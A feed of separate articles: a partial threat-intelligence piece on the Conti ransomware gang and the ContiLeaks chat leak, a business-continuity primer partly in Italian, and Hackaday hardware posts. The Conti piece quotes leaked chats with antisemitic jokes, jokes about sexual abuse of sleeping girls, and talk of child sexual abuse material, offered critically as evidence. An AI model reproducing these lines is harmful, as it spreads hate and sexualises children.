Beyond the attacks, in 2021 Conti decided to sell victims’ access to third parties as a new feature of its business model. The RaaS extended the malware’s capabilities and its tooling for wiping victims’ backups. Conti grew in money, affiliates and capabilities. They never miss a chance to wink at, or shame, Western countries (United States, United Kingdom and European Union) while earning as much as possible in the meantime.
The World – No Angels in the game, just Demons
2022 began and Conti kept populating its DLS. Everything was returning to normal after two years of COVID-19 and economic losses; slowly the world was recovering and ready to stabilize. On February 24 President Putin announced the deployment of Russian troops in the Donbass to support the separatist forces in the Donetsk and Luhansk regions, protecting them from the “genocide” caused by Ukraine; minutes later his words became reality. The rest is history, ready to be written when the war reaches its conclusion.
At the time, ransomware groups were not too explicit in public about their political positions; mixing politics with business is not a good idea. On February 25 Conti published a new post on its DLS, this time with no new victims. Just a message to the world.
This was a novelty in the ransomware landscape. Conti did not just take a stand, but also warned other countries against “any war activities” against Russia, on pain of digital retaliation.
Headlines were flooded with their statements, while outsiders were confused, skeptical or frightened. It is hard to digest when the same group that paralyzed a good part of the Irish healthcare system is ready to pull the trigger on your critical infrastructure.
For a while, silence and tension were the only things dominating the room. In less than a week something new shook the infosec environment once again, but this time it did not come from Conti.
On February 27 Conti learned that its stance and threats came at a price, and a Ukrainian security researcher was there, ready to answer once and for all. The ContiLeaks account on Twitter/X announced, with a link, that 13 months of Conti chat logs had been leaked.
twitter.com/ContiLeaks/status/…
All messages from January 29 (2021) to February 27 (2022) are now available to everyone. The messages come from a Jabber server and from Rocket.Chat logs. Some usernames recur: Defender, Stern, Mango and Target (keep the last one in mind), just to name a few. “Max” (Alla Witte) also appears in the chat logs.
Check Point Research did an extraordinary job with an in-depth analysis of the chat logs, and something special is their chart representing the group’s organizational structure.
Even if it was only a small scratch, what emerged from the analysis was somewhere between brilliant and surprising. The group’s structure is really far from a simple group of IT specialists. Human resources, sysadmins, affiliates, negotiators, operators and developers are clearly distinguished from one another, with working hours and days off like in a normal company. They even have projects beyond the malware, such as creating a social network for blackhats. An “employee of the month” program was also part of Conti’s corporate structure: the individuals with the best results were rewarded with an extra paycheck.
To understand how professional these people are, consider that when Windows 11 came out Conti had a team dedicated to reverse engineering the software in search of new exploits and abuses.
The chats include recruitment, updates, requests for executables/DLLs for encryption, and relationships with other ransomware families such as Ryuk, Maze and LockBit (apparently LockBitSupp himself joined the chat under the pseudonym “Brom”). A good part of the development process concerned AV evasion, where “employees” asked their “supervisor” to buy CarbonBlack AV and other major AV/EDR products. The same goes for reverse engineering and testing, for which a refurbished SonicWall (SMA 410, the new model at the time) was purchased.
ContiLeaks was not satisfied yet, and so on March 1 and 2 released fresh new logs from the Jabber servers.
twitter.com/ContiLeaks/status/…
twitter.com/ContiLeaks/status/…
twitter.com/ContiLeaks/status/…
In these new chats we have a conversation between Mango and JhonyBoy77 discussing an exfiltrated email concerning Alexei Navalny.
The chats also included the members’ opinions on Ukraine, Russia and the war in the Donbass.
Patrick: The war was inevitable, Ukraine submitted a request for the nuclear weapons in its possession
Weldon: monkeys don’t explain things, they climb trees
Elijah: @patrick well done and done. Anyway, nobody will ever use it. Yes, just to scare
Elijah: Look, North Korea’s missiles periodically land in the territorial waters of the Russian Federation. But nobody worries about it. And by the way, they have nuclear weapons. But somehow nobody got alarmed
Patrick: old man, you’re wrong, there’s no doubt about North Korea now. Nobody is happy about the war, brothers, but it’s time to put this neo-Nazi gang of Canaris’s adopted children on trial.
Their opinion of Zelensky is obviously not tender, and they took the opportunity to point out his Jewish origins.
Weldon: Zelensky is a Jew. Oh, fuck!
Kermit: Jews. Oh, great. My favorites
Weldon: Exactly, not a Jew, but a Jew.
Kermit: fuck, I wish I were a Jew. you just need to be born a Jew to be considered a member of a secret society and mess up Russians’ lives.
Weldon: a Tatar was born – a Jew cried
Gelmut: a black Crimean Tatar born in Odessa, who received Russian citizenship 😀
Weldon: Obama?
Gelmut: A Jewish child goes to his parents and says: “I want to be Russian”. To which the parents reply: – If you want to be Russian, go to the corner and stand there all day without food. Half a day later the parents ask: “How is life as a Russian?” And the boy answers: – I’ve only been Russian for two hours, but I already hate you Jews.
Still with reference to Ukraine, they define the Holodomor as a sort of “fairy tale”.
Many sexist and homophobic messages were sent in the Rocket.Chat without any objection from the other members, who followed along.
The most disturbing thing is the “black humor” about child abuse.
Angelo: is it possible to fuck girls while they’re sleeping?
Elroy: No, get enough sleep, then, in the evening…
Angelo: ok, I’ll put the tape back
Benny: iconic footage…
They also share with the others what they are watching.
Kermit: after my link everyone definitely went to try
Angelo: cp what is that?
Kermit: Child pornography
Angelo: No, even under 17 there’s no way
Kermit: Come on
Angelo: Well, 16
Kermit: At 16 there are certain “lyali”
Regardless of these problematic and disturbing topics of discussion, most of the messages show that the Conti guys are ordinary people with their daily lives, their vices and their families. Their theses on Ukraine and on other anti-Russian individuals are in line with the Russian narrative; the decision to explicitly support Russia is not something to be surprised about.
The chats were not the only thing to come out of the underground: the source code of the Conti ransomware and of the TrickBot backend was also leaked. The latter was extremely useful for collecting IoCs and preventing some of the attacks that used that infrastructure, a good hit given how heavily the tool was used in ransomware operations.
The Conti source code is a completely different story; the real backfire was yet to come. A group of hackers under the label NB65 broke the unwritten rule of ransomware: Never. Attack. CIS. Countries. They took the leaked source code, modified some parts and removed the language safeguards that prevented encryption on machines in CIS countries. When everything was ready they began attacking Russian companies and, instead of the typical ransom notes demanding payment, they left a text note stating that the attacks were a response to Russia’s invasion of Ukraine.
The companies hit were Tensor (a document management operator), Roscosmos (space industry) and VGTRK (the well-known Russian state-owned broadcaster). VGTRK suffered a huge data exfiltration, 786.2 GB, most of it emails and files. This time there is no DLS: everything can be found on the Distributed Denial of Secrets website. The leaked sensitive documents include evidence of the Kremlin’s influence over the direction of broadcast content and some “advice” on how to cover specific events, coming directly from the FSB.
twitter.com/xxNB65/status/1507…
twitter.com/xxNB65/status/1534…
Conti learned that provocations are not always the best choice; its stance on Ukraine probably angered many people, even inside its own group. ContiLeaks gave an interview to CNN providing some information about their mission.
He confirmed he is Ukrainian and explained the leak with “I can’t shoot, but I can fight with a keyboard and a mouse”. According to the interview, he spent his days inside a bunker with his laptop, exfiltrating every possible message. He added that the FBI contacted him directly asking him to stop so as not to hinder their investigation; he paused for a while but completed the leak regardless of the FBI’s recommendations.
The FBI suggested that he keep his covert access and contribute directly with law enforcement; the reason behind this was (probably) the tension already in play because of the war. Biden and Putin had a phone call in 2021, after which some major REvil members were arrested in Russia; this was the first sort of collaboration between the two states in terms of arrests for digital crimes. The actions of ContiLeaks probably contributed to breaking the thin collaboration between the eagle and the bear.
Ace of Pentacles – 406, Not Acceptable
The Conti leak can be described as the Panama Papers of Ransomware-as-a-Service: they called themselves patriots and acted as such. Showing what lies behind the curtains was sensational; the substance behind the form was highly organized, with a dense workflow and deadlines. The “company” even helped Alla Witte with her legal expenses by donating $10,000.
They had human resources, recruitment campaigns and everything else analogous to a real company. Simply astonishing. From now on the CTI community will be truly aware of the scale of each group; a perfect example is LockBit, which made professionalism the main attribute of the first and only ransomware “brand” ever.
Ties to the Russian government were not a surprise, but having the evidence in front of you can still have an effect. Not only did they take their nationalism very seriously, but they acted to prove it every time they had the opportunity.
The first arrests and the friendly fire put Conti, at this point in the story, in a dangerous situation. The use of its own ransomware on the very territory it claimed to protect was a hard blow to the group’s reputation.
To readers: do not confuse what you read in this article with the norm for every RaaS or digital threat out there. The stereotype of the “evil Russian hacker”, like all stereotypes, has a real basis but is not enough to generalize the whole landscape. Most groups do not talk (at least explicitly) about politics and nationalism the way Conti did. Obviously they only enjoy advantages as long as they respect the “No CIS” rule, but this does not automatically mean their actions are state-sponsored or motivated by nationalism. Please treat headlines from non-technical outlets with care and distinguish between state-sponsored actors and RaaS groups.
The Conti story is still far from its conclusion; there are many surprises worth telling. In the next episode we will find out what happens when the sickest RaaS on the scene gets humiliated. Remember the user called “Target”? He will be one of the new protagonists of the next episode; enjoy the image below as a trailer for the next part.
To be CONTInued…
The article The Story of Conti Ransomware – War in the Age of Ransomware (Episode 2) comes from il blog della sicurezza informatica.
Analysis and Planning for Business Resilience: Understanding RA, BIA, BCP, DRP and IRP
Today more than ever, companies face risks and threats of every kind: from cyber attacks to natural disasters to unexpected operational disruptions. To respond effectively to these challenges and guarantee operational continuity, there are several methodologies and tools that, working together, form an integrated protection system.
We are talking about Risk Assessment (RA), Business Impact Analysis (BIA), Business Continuity Plan (BCP), Disaster Recovery Plan (DRP) and Incident Response Plan (IRP).
These apparently technical terms are actually easy to understand when placed in a logical flow. Let’s see what they are and, above all, how they fit into the right sequence to build an effective strategy.
Starting from the beginning: Risk Assessment (RA)
The starting point is always the Risk Assessment. This process serves to identify what could go wrong within the organization, which vulnerabilities are most relevant and which risks could have a significant impact. For example, it evaluates the likelihood of cyber attacks, power outages, earthquakes or other critical events.
But why is it important to start here? Because without a clear map of the risks, it would be impossible to plan how to mitigate or manage them. The Risk Assessment thus becomes the basis for all subsequent phases: it identifies threats, evaluates their impacts and helps set priorities.
Understanding the impact: Business Impact Analysis (BIA)
Once we understand which risks we face, we need to ask: “What impact would this risk have on business operations?”. This is where Business Impact Analysis comes in. This analysis lets us identify which business processes are truly critical and how long we can tolerate an interruption before significant damage occurs (the maximum tolerable period of disruption, from which the recovery time and recovery point objectives, RTO and RPO, are derived).
A practical example: imagine an e-commerce company. The BIA will tell us that the website and the payment system are critical processes and that an outage of more than a few hours could cause significant financial losses as well as reputational damage. With this information, we can establish what to focus on in an emergency.
Pianificare la continuità: Business Continuity Plan (BCP)
Ora che conosciamo i rischi e i processi critici, è il momento di sviluppare un piano per mantenere l’azienda operativa anche durante una crisi: il Business Continuity Plan. Questo documento descrive cosa fare per garantire che l’azienda continui a funzionare, o riprenda il prima possibile, in caso di interruzioni.
Ad esempio, il BCP può includere strategie come spostare i dipendenti in sedi alternative, attivare backup dei dati o stabilire comunicazioni di emergenza con i clienti. È importante che il BCP sia pratico e ben testato: non basta scriverlo, bisogna assicurarsi che funzioni davvero.
Ripristinare i sistemi: Disaster Recovery Plan (DRP)
Tra le parti fondamentali del BCP c’è il Disaster Recovery Plan, che si concentra esclusivamente sui sistemi tecnologici. Se un attacco informatico manda offline i server o se un disastro naturale danneggia i data center, il DRP descrive come ripristinare i sistemi IT nel minor tempo possibile.
Perché è importante distinguere il DRP dal BCP? Perché il DRP si concentra solo sull’aspetto tecnologico, come il recupero di dati da backup o la riconfigurazione di infrastrutture IT. Senza un DRP efficace, molte aziende non riuscirebbero a riprendere le loro attività operative.
Handling incidents: Incident Response Plan (IRP)
Finally, there is the Incident Response Plan, which deals with specific incidents such as cyber attacks or data breaches. The IRP describes how to detect these events and respond to them quickly, limiting the damage and minimizing downtime.
For example, if ransomware hits the company, the IRP establishes who must respond, which actions to take immediately (such as isolating the infected systems) and how to communicate with the parties involved. The goal is to contain the problem before it spreads.
The right sequence
These tools do not work in isolation; they fit into a logical sequence that builds up a complete strategy:
- Risk Assessment (RA): identifies the risks and vulnerabilities.
- Business Impact Analysis (BIA): determines which business processes are most critical and what impact an interruption would have.
- Business Continuity Plan (BCP): plans how to maintain or restore business operations.
- Disaster Recovery Plan (DRP): details how to restore IT systems and technology infrastructure.
- Incident Response Plan (IRP): defines how to handle specific incidents and contain emergencies.
An integrated system for business resilience
These tools are not standalone; they work together so that an organization can prevent, withstand and recover from adverse events. The Risk Assessment and the Business Impact Analysis provide the foundation; the Business Continuity Plan is the strategic vision, while the Disaster Recovery Plan and the Incident Response Plan focus on operational actions.
Implementing these analyses and plans correctly not only reduces risk but also increases the confidence of customers, employees and stakeholders, ensuring that the company is ready to face disruption when it comes.
The article Analisi e Pianificazione per la Resilienza Aziendale: Comprendere RA, BIA, BCP, DRP e IRP originally appeared on il blog della sicurezza informatica.
Building A Pi-Powered LED Chess Board
If you live near Central Park or some other local chess hub, you’re likely never short of opponents for a good game. If you find yourself looking for a computer opponent, or you just prefer playing online, you might like this LED chessboard from [DIY Machines] instead.
At heart, it’s basically a regular chessboard with addressable LEDs of the WS2812B variety under each square. The lights are under the command of an Arduino Nano, which is also tasked with reading button inputs from the board’s side panel. The Nano is interfaced with a Raspberry Pi, which is the true brains of the operation. The Pi handles chess tasks—checking the validity of moves, acting as a computer opponent, and connecting online for games against other humans if so desired. Everything is wrapped up with 3D printed parts, making this an easy project to build for the average DIY maker.
The video tutorial does a great job of covering the design. It’s a relatively simple project at heart, but the presentation is great and it looks awfully fun to play with. We’ve featured some other great builds from [DIY Machines] before, too. Video after the break.
youtube.com/embed/Z92TdhsAWD4?…
Solar Orbiter Takes Amazing Solar Pictures
There’s an old joke that they want to send an exploratory mission to the sun, but to save money, they are going at night. The European Space Agency’s Solar Orbiter has gotten as close as anything we’ve sent to study our star on purpose, and the pictures it took last year were from less than 46 million miles away. That sounds far away, but in space terms, that’s awfully close to the nuclear furnace. The pictures are amazing, and the video below is also worth watching.
Because the craft was so close, each picture it took was just a small part of the sun’s surface. ESA stitched together multiple images to form the final picture, which shows the entire sun as 8,000 pixels across. We’ll save you the math. We figure each pixel is worth about 174 kilometers or 108 miles, more or less.
The stunning images used the Polarimetric and Helioseismic Imager and the Extreme Ultraviolet Imager. The first instrument snapped the visible light and the magnetic field lines. It also provided a velocity map. The UV instrument took pictures of the corona.
Understanding the sun is important because it greatly impacts our life on Earth. Technology is especially sensitive, and, lest we forget, massive solar disruptions have happened before.
youtube.com/embed/SgTBMzjuqX0?…
An Over-Engineered Basement Monitor
[Stephen] has a basement that depends on a sump pump. What that means is if the pump fails or the power goes out, the basement floods—which is rather undesirable. Not wanting to rely on a single point of failure, [Stephen] decided to build a monitor for the basement situation, which quickly spiralled to a greater degree of complexity than he initially expected.
The initial plan was just to have water level sensors reporting data over a modified CATS packet radio transmitter. On the other end, the plan was to capture the feed via a CATS receiver, pipe the data to the internet via FELINET, and then have the data displayed on a Grafana dashboard. Simple enough. From there, though, [Stephen] started musing on the possibilities. He thought about capturing humidity data to verify the dehumidifier was working. Plus, temperature would be handy to get early warning before any pipes were frozen in colder times. Achieving those aims would be easy enough with a BME280 sensor, though hacking it into the CATS rig was a little challenging.
The results are pretty neat, though. [Stephen] can now track all the vital signs of his basement remotely, with all the data displayed elegantly on a nice Grafana dashboard. If you’re looking to get started on a similar project, we’ve featured a great Grafana guide at a previous Supercon, just by the by. All in all, [Stephen’s] project may have a touch of the old overkill, but sometimes, the most rewarding projects are the ones you pour your heart and soul into!
E-Ink Screen Combined With Analog Dial Is Epic Win
Analog dials used to be a pretty common way of displaying information on test equipment and in industrial applications. They fell out of favor as more advanced display technologies became cheaper. However, if you combine an analog dial with a modern e-ink display, it turns out you get something truly fantastic indeed.
This build comes to us from [Arne]. The concept is simple: get an e-ink display and draw a dial on it using whatever graphics and scale you choose. Then put it behind a classic coil-driven analog meter movement, in place of the usual printed paper scale. Now you have an analog dial that can display any quantity you desire; just redraw the screen whenever you need a different scale. Meanwhile, if the scale does not change, the e-ink panel draws no power to keep showing it.
[Arne] explains how it all works in the writeup. It’s basically a LilyGo T5 ESP32 board with an e-ink screen attached, and it’s combined with a MF-110A multimeter. It’s super easy to buy that stuff and start tinkering with the concept yourself. [Arne] uses it with Home Assistant, which is as good an idea as any.
You get all the benefits of a redrawable display, with the wonderful visual tactility of a real analog dial. It's a build that smashes old and new together in the best way possible. It doesn't hurt that [Arne] chose a great retro font for the dial, either. Applause all around!
Square Roots 1800s Style — No, the Other 1800s
[MindYourDecisions] presents a Babylonian tablet dating back to around 1800 BC that shows that the diagonal of a unit square (the hypotenuse of a right triangle with two unit sides) is the square root of two, or 1.41421. How did they know that? We don't know for sure how they computed it, but experts think it is the same as the ancient Greek method written down by Hero. It is a special case of Newton's method. You can follow along and learn how it works in the video below.
The method is simple. You guess the answer first, then you compute the difference and use that to adjust your estimate. You keep repeating the process until the error becomes small enough for your purposes.
For example, suppose you wanted to take the square root of 85. You can observe that 9 squared is 81, so the answer is sort of 9, right? But that's off by 4 (85-81=4). So you take that error and divide it by twice the current answer (2 x 9 = 18). In other words, the adjustment is 4/18 or 0.2222. Putting it together, our first answer is 9.2222.
If you square that, you get about 85.05, which is not too bad, but if you wanted closer you could repeat the process using 9.2222 in place of the 9. Repeat until the error is as low as you like. Our calculator tells us the real answer is 9.2195, so that first result is not bad. A second pass gives 9.2195, already matching the calculator to four decimal places. You could keep going, but that's close enough for almost any purpose.
The video shows a geometric representation, and if you are a visual thinker, that might help you. We prefer to think of it algebraically: each new estimate is the average of the current guess and the number divided by that guess. Adding the error over twice the guess, as above, gives exactly the same value.
The ancients loved to estimate numbers. And Hero was into a lot of different things.
youtube.com/embed/MXveVqBxFow?…
Keebin’ with Kristina: the One with the TRON Keyboard
[Folaefolc] was craving a new keyboard build a few weeks ago and got inspired by the humble 3.5″ floppy disk. So much so that he decided to make a split keyboard with each half having the exact footprint of a floppy — 90 mm x 94 mm. And you know the PCBs have floppy details silkscreened on the back. Just check out the gallery.
Image via [Folaefolc] via reddit
This bad boy uses a pair of Liatris microcontroller boards, which are made by splitkb and are designed as drop-in replacements for the Pro Micro.
The other fun part of this build is that [Folaefolc] used RJ9 connectors to join the halves instead of something like TRRS.
Beneath those candy keycaps are 34 Kailh choc v1 switches shoved into hot swap sockets in case [Folaefolc] changes his mind. Gerbers are available if you want to build one of these cuties!
Via reddit
A Bicycle Built for Two Hands
[Lachlan Kermode] got so heavy into cycling last summer that he figured out the best possible way to do so while getting work done. Now, if only he could get some fresh air as well.
Image by [Lachlan Kermode] via OHRG
Phase Zero involved simply sliding the stationary bike under the standing desk, but that didn't really work for keyboarding. Once someone noted that [Lachlan]'s keyboard is from the ZSA family and pointed him toward the tripod mount, he was on the right track.
This mount is basically just a couple of magnets that attach to the keyboard halves and let you mount them to a standard tripod screw. A couple of camera clamps later, and Bob became [Lachlan]’s proverbial uncle.
Having used it for a while now, [Lachlan] found the most comfort with the halves pointed downward at a 45° angle, which allows him to rest his palms on the handlebars and type fairly comfortably. It’s going to take some experimentation to get it perfect, but he seems to be most of the way there.
The Centerfold: This 90s Japanese TRON Keyboard
Image via reddit
No, not TRON (1982). This keyboard refers to the Japanese operating system and Unicode alternative, where TRON stands for The Real-time Operating system Nucleus. I’m not sure how many fingers you’re supposed to have to use this thing, which looks at once both ergonomic and wildly not, what with those faraway pinkie keys. Hey, at least it’s Dvorak? See also Xah Lee’s page and this video for more about these keyboards.
youtube.com/embed/DdleC5v5O0M?…
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: The Fitch (American)
Image via The Antikey Chop
Yes there are British Fitches as well, and they were slightly different than the American Fitch. I’m guessing that both models bore that wild rear-downstrike typebar arrangement which both distinguished it and doomed it to failure. Be sure to check out the other pictures on the Antikey Chop site, including the really strange layout.
The Fitch could type 78 characters with its 26-key, double-shift keyboard. The 1u Space is of particular interest. Ink was transferred via roller, and the earliest specimens had a pair of reservoirs behind the carriage for spare rollers.
Though this machine looks heavy (at least to me), the Fitch weighed only 11 pounds and took up a cubic foot of space. It was never advertised as a portable, though the Antikey Chopkeep theorizes that they could have been. These Fitches were evidently quite well-built little machines, which makes their lightness that much more intriguing.
ICYMI: ESP32 Hosts Keyboard
Image via YouTube
You’re likely aware of the USB device mode of an ESP32. But did you know that they can act as HID hosts, too? That’s Human Interface Devices — keyboards, mice, trackballs, and the like.
For this project, [Volos] used the EspUsbHost Arduino library, which makes USB host mode a relatively simple thing to use. Key to success here is the LCD board: it has a dual-role USB-C port, so the hardware required to switch roles is right there.
On the software side, [Volos] created a simple word processing program that saves and loads files from a microSD card, using a four-bit palette to save on memory.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.